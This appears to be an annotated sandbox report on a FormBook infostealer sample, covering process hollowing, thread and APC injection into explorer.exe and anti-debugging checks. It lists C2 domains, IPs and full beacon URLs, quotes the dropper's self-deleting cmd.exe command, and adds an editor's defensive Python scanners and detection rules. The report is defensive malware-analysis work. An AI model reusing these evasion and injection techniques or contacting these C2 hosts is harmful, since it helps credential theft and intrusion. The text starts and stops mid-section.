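SAMPLE_CODE = bytes.fromhex(
    "55 8b ec "               # push ebp; mov ebp, esp
    "64 a1 30 00 00 00 "      # mov eax, fs:[30h]              (offset 3)
    "0f b6 40 02 "            # movzx eax, byte ptr [eax+2]    BeingDebugged
    "85 c0 75 10 "            # test eax, eax; jnz +10h
    "64 8b 0d 30 00 00 00 "   # mov ecx, fs:[30h]              (offset 17)
    "8b 41 0c "               # mov eax, [ecx+0Ch]             Ldr
    "64 8b 1d 30 00 00 00 "   # mov ebx, fs:[30h]              (offset 27)
    "8b 43 68 "               # mov eax, [ebx+68h]             NtGlobalFlag
    "c9 c3 "                  # leave; ret
)

# Function addresses from the report: process 3 (hollowed sample) and process 12 (raserver.exe).
PROC3_FUNCS = [0x0197AE73, 0x01A1AE44, 0x0196766D]
PROC12_FUNCS = [0x04B2AE73, 0x04BCAE44, 0x04B1766D]

if __name__ == "__main__":
    for off, reg, field in scan_peb_reads(SAMPLE_CODE):
        print(f"+{off:04X}: mov {reg}, fs:[30h]  -> {field}")
    print(f"rebase delta: {shared_rebase_delta(PROC3_FUNCS, PROC12_FUNCS):#x}")
```

Run against a dumped region (for example the 3.2 and 12.2 memory dumps the report names) the scanner gives the same per-function tally the sandbox prints, and the delta check is a quick way to confirm that two injected regions are one payload rather than two.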
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Memory allocated: page read and write | page guard
Note: both XhU4EXUp0x.exe instances and raserver.exe enable SeDebugPrivilege, which is what lets them open explorer.exe with the write and thread-control access used for the injection recorded in the next section. The PAGE_READWRITE | PAGE_GUARD allocation is a common anti-analysis trick: the code expects to catch its own guard-page exception, and a debugger or hooking engine that intercepts the fault first changes the observed behaviour.

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.gentrypartyof8.com
Source: C:\Windows\explorer.exe | Domain query: www.rsyueda.com
Source: C:\Windows\explorer.exe | Network Connect: 23.82.229.132 80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.146 80
Note: explorer.exe (PID 3424 in the thread-injection entries below) was not created by the sample; it received a mapped section, a rewritten thread context and a queued APC from XhU4EXUp0x.exe, so the two DNS lookups and the two port-80 connections are the injected FormBook code running inside the shell. For detection, tie network events from explorer.exe to the preceding cross-process writes rather than alerting on the shell's network activity alone, since explorer.exe does open connections of its own.
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\raserver.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\raserver.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe | base address: 1370000
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
Note: the sample hollows a second copy of itself (the 0x400000 image of process 3 already matches the FormBook Yara rule in the round-0 dump, i.e. before that process ran), and the original image of the suspended raserver.exe is unmapped at 0x01370000 before the payload is written over it. The report attributes the unmapping and the section writes into raserver.exe to XhU4EXUp0x.exe, while the behavior graph shows raserver.exe being started from the injected explorer.exe. The final cmd.exe /c del removes the dropper from disk once the payload is running from raserver.exe, so the on-disk sample will be gone by the time a responder looks for it.
Source: explorer.exe, 00000005.00000000.657818054.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.669694519.0000000005E50000.00000004.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Note: Progman, Program Manager and Shell_TrayWnd are the window class and title names of the Windows desktop shell; they occur naturally in explorer.exe's memory (process 5) and here also in raserver.exe's memory (process 0xC), which is how code locates the shell process from user mode.
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Users\user\Desktop\XhU4EXUp0x.exe VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: the GAC assemblies loaded by the first stage (Microsoft.VisualBasic, System.Windows.Forms, System.Management) identify it as a .NET loader; System.Management is the path for the WMI Win32_VideoController query flagged in the signature overview. MachineGuid is commonly read as a stable per-host identifier.
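Added example (editor's code, not from the report or from Joe Sandbox): detection logic for two of the behaviours in this section, a Windows system process opening connections after it received injected code, and a cmd.exe /c del that removes an executable which ran earlier in the trace. It runs over a constructed event trace that mirrors the report's process chain; the event schema, the rule names and every PID except explorer.exe's 3424 are assumptions made for the example.

```python
"""Two detection rules over a process/injection/network event stream.
Editor's example; the trace below is constructed to mirror the report."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    """One trace record. kind is 'process' (creation), 'inject' (cross-process
    write, SetThreadContext or queued APC) or 'network' (outbound connect)."""
    kind: str
    pid: int
    image: str            # full path of the acting process
    cmdline: str = ""
    target_pid: int = 0   # for 'inject'
    dst_ip: str = ""      # for 'network'
    dst_port: int = 0     # for 'network'


# "del <path>.exe" with the path optionally wrapped in double or single quotes
# (the sandbox renders the double quotes of the real command line as single ones).
DEL_RE = re.compile(r"""\bdel\s+["']?([^"'&]+?\.exe)["']?(?=\s|$)""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    seen_images = set()   # image paths of every process created so far
    injected = set()      # PIDs that received injected code
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if ev.kind == "process":
            seen_images.add(ev.image.lower())
            m = DEL_RE.search(ev.cmdline)
            if basename(ev.image) == "cmd.exe" and m:
                target = m.group(1).strip().lower()
                if target in seen_images:          # deleting something that ran
                    hits.append(("self_delete", f"pid {ev.pid} deletes {target}"))
        elif ev.kind == "inject":
            injected.add(ev.target_pid)
        elif ev.kind == "network":
            # Only a Windows binary that has already been injected into is flagged;
            # explorer.exe opening connections on its own is normal.
            if ev.image.lower().startswith("c:\\windows\\") and ev.pid in injected:
                hits.append(("injected_system_process_network",
                             f"{basename(ev.image)} pid {ev.pid} -> {ev.dst_ip}:{ev.dst_port}"))
    return hits


# Constructed trace following the report's chain: sample -> hollowed self ->
# injection into explorer.exe (PID 3424 from the report) -> C2 connects ->
# raserver.exe -> cmd.exe /c del of the dropper. PIDs other than 3424 are invented.
SAMPLE_TRACE = [
    Event("process", 5824, r"C:\Users\user\Desktop\XhU4EXUp0x.exe", r"C:\Users\user\Desktop\XhU4EXUp0x.exe"),
    Event("process", 5900, r"C:\Users\user\Desktop\XhU4EXUp0x.exe", r"C:\Users\user\Desktop\XhU4EXUp0x.exe"),
    Event("inject", 5900, r"C:\Users\user\Desktop\XhU4EXUp0x.exe", target_pid=3424),
    Event("network", 3424, r"C:\Windows\explorer.exe", dst_ip="23.82.229.132", dst_port=80),
    Event("network", 3424, r"C:\Windows\explorer.exe", dst_ip="66.235.200.146", dst_port=80),
    Event("process", 6012, r"C:\Windows\SysWOW64\raserver.exe", "raserver.exe"),
    Event("process", 6100, r"C:\Windows\SysWOW64\cmd.exe",
          r'cmd.exe /c del "C:\Users\user\Desktop\XhU4EXUp0x.exe"'),
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_TRACE):
        print(f"{rule}: {detail}")
```

The self-delete rule deliberately matches against every image seen in the trace rather than the cmd.exe parent chain: here the deleted file belongs to the first process, while cmd.exe descends from raserver.exe and the injected explorer.exe, so a parent-only check would miss it.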

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
Note: in the dump names the first field is the process number used throughout the report (0 = first XhU4EXUp0x.exe, 3 = the hollowed second instance, 0xC = raserver.exe), the fourth is the region's base address and the fifth its page protection (00000040 = PAGE_EXECUTE_READWRITE, 00000004 = PAGE_READWRITE). The FormBook matches in process 0 are in read-write heap regions (0x36B9000, 0x37F7000), consistent with the decrypted payload sitting in the .NET loader's memory before it is written into the child; in processes 3 and 12 they are in executable regions, i.e. the running payload.

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | the same thirteen memory dumps and unpacked PE files listed under "Stealing of Sensitive Information" above; the report files the FormBook Yara hits under both categories.
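Added example (editor's code, not part of the report): the two C2 requests explorer.exe issued after injection appear in full in the URL table later on this page, one per domain, and they share a path (/nff/) and a second query parameter whose value does not change. The function below clusters URLs by that request shape, so a single extracted configuration can be turned into a fingerprint that matches sibling C2 domains. The clustering rule is the editor's, not FormBook's documented URI format; the URL rows in the table carry the detection column ("0%") directly after the URL, so the URLs are taken to end in f2MHEhOHwH.

```python
"""Cluster beacon URLs by request shape (path, parameter names, invariant values).
Editor's example; the two URLs are the C2 requests from the report's URL table."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Unpadded/padded base64 alphabet, which the varying parameter values here use.
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

ClusterKey = Tuple[str, Tuple[str, ...]]   # (path, parameter names in order)


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split k=v pairs without URL-decoding, so '+' and '/' in the blob survive."""
    pairs = []
    for part in query.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs.append((k, v))
    return pairs


def cluster_beacons(urls: List[str]) -> Dict[ClusterKey, dict]:
    """Group URLs that share path and parameter names; within a group, report
    parameters whose value is identical on every host (invariant) and
    parameters that vary but look like an encoded blob (opaque)."""
    clusters: Dict[ClusterKey, dict] = {}
    for url in urls:
        u = urlsplit(url)
        pairs = split_query(u.query)
        key: ClusterKey = (u.path, tuple(k for k, _ in pairs))
        c = clusters.setdefault(key, {"hosts": [], "values": {k: [] for k, _ in pairs}})
        c["hosts"].append(u.hostname)
        for k, v in pairs:
            c["values"][k].append(v)
    for c in clusters.values():
        multi = len(c["hosts"]) > 1          # invariance means nothing for a single host
        c["invariant"] = ({k: vs[0] for k, vs in c["values"].items() if len(set(vs)) == 1}
                          if multi else {})
        c["opaque"] = [k for k, vs in c["values"].items()
                       if k not in c["invariant"] and all(B64ISH.match(v) for v in vs)]
    return clusters


# The two C2 requests from the report's URL table.
REPORT_URLS = [
    "http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH",
    "http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH",
]

if __name__ == "__main__":
    for (path, params), c in cluster_beacons(REPORT_URLS).items():
        print(f"{path} params={params} hosts={c['hosts']}")
        print(f"  invariant={c['invariant']} opaque={c['opaque']}")
```

The invariant parameter (7nSX=f2MHEhOHwH) plus the path is the part worth carrying into a network signature; the opaque 2dWD value changes per request and should not be matched literally.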

Mitre Att&ck Matrix

The report's matrix, rebuilt one tactic per line. Entries with digits in brackets are the techniques the report matched (the digits are the count badges printed next to them in the original matrix, kept as-is); unmarked entries carry no finding in this report.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [1]; Shared Modules [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [512]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit [1]; Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [141]; Process Injection [512]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [3]
Credential Access: Credential API Hooking [1]; Input Capture [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [331]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Remote System Discovery [1]; System Information Discovery [112]; System Owner/User Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking [1]; Input Capture [1]; Archive Collected Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 433531 | Sample: XhU4EXUp0x.exe | Startdate: 12/06/2021 | Architecture: WINDOWS | Score: 100

Process tree recovered from the graph (each node lists the signatures, dropped files and network endpoints the graph attaches to it):

Start: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
  XhU4EXUp0x.exe (started)
    dropped: C:\Users\user\AppData\...\XhU4EXUp0x.exe.log (ASCII)
    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect virtualization through RDTSC time measurements
    XhU4EXUp0x.exe (started; second instance of the sample)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: www.rsyueda.com 23.82.229.132, port 49765 -> 80, LEASEWEB-USA-SEA-10US, United States; gentrypartyof8.com 66.235.200.146, port 49762 -> 80, CLOUDFLARENETUS, United States; www.gentrypartyof8.com
        signatures: System process connects to network (likely due to code injection or exploit)
        raserver.exe (started)
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)
            conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
XhU4EXUp0x.exe | 21% | Virustotal | 
XhU4EXUp0x.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
XhU4EXUp0x.exe | 100% | Joe Sandbox ML | 

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.2.XhU4EXUp0x.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.XhU4EXUp0x.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH | 0% | Avira URL Cloud | safe
http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
www.yellow-wink.com/nff/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.rsyueda.com | 23.82.229.132 | true | true | | unknown
gentrypartyof8.com | 66.235.200.146 | true | true | | unknown
www.gentrypartyof8.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH | true | Avira URL Cloud: safe | unknown
http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH | true | Avira URL Cloud: safe | unknown
www.yellow-wink.com/nff/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
66.235.200.146 | gentrypartyof8.com | United States | 13335 | CLOUDFLARENETUS | true
23.82.229.132 | www.rsyueda.com | United States | 396190 | LEASEWEB-USA-SEA-10US | true

                                        General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433531
Start date: 12.06.2021
Start time: 08:56:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: XhU4EXUp0x.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 17.9% (good quality ratio 16.3%)
• Quality average: 73.8%
• Quality standard deviation: 30.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 94
• Number of non-executed functions: 168
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.88.21.125, 52.147.198.201, 52.113.196.254, 104.43.139.144, 20.82.209.104, 20.54.104.15, 20.54.7.98, 205.185.216.10, 205.185.216.42, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
• Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, a-0019.a-msedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, teams-9999.teams-msedge.net, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, 